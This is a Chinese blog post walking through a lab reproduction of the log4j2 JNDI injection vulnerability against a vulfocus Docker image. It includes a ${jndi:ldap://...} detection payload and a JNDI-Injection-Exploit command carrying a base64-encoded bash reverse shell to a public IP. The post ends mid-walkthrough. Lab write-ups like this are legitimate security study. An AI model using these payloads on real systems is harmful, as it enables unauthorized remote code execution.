log4j2漏洞复现

最近的特大漏洞log4j2的出现，也是掀起了安全圈的一个风暴呀，自己也尝试着来复现一下吧，毕竟慢慢成长嘛。

漏洞描述Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等，通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发，用来记录日志信息。Log4j-2中存在JNDI注入漏洞，当程序将用户输入的数据被日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大，建议客户尽快采取措施防护此漏洞影响版本Apache Log4j 2.x < 2.15.0-rc2

下面直接开始复现

现在虚拟机上面拉个Java环境，这样方便嘛

直接执行代码docker pull vulfocus/log4j2-rce-2021-12-09:latest

然后docker images 观看是那个镜像文件，把它跑起来

直接docker run -d -P vulfocus/log4j2-rce-2021-12-09 然后看这个跑起来的虚拟机的那个端口号映射到了本虚拟机的端口号docker ps

然后就直接访问这个网页是否搭建成功直接访问192.168.227.128：49153 192.168.227.128是我kali虚拟机的ip

然后就要先检测这个网页是否纯在log4j2这个漏洞，直接上bp。这里要主要箭头的地方，直接构造的payload要使用自己ceye上的payload=${jndi:ldap://zzz.yqy3cn.ceye.io} 前面的二级域名随便写什么，不写也可以。

然后在ceye.io上出现了这个以后，就代表纯在这个log4j2漏洞。

现在就到了最刺激的一步了，直接来弹shell吧。。

首先我们要启动一个idap服务，那就去github（JNDI-Injection-Exploit）上面下载吧。下载完成后在本地执行命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuMjI2LjY3Lzk5OTkgMD4mMQ}|{base64,-d}|{bash,-i}”-A “xxxxx(执行这个命令的本机ip)”

当然我这里是在自己的服务器上执行的，都可以看感觉吧哈哈哈

先把这个文件提到我的服务器上面去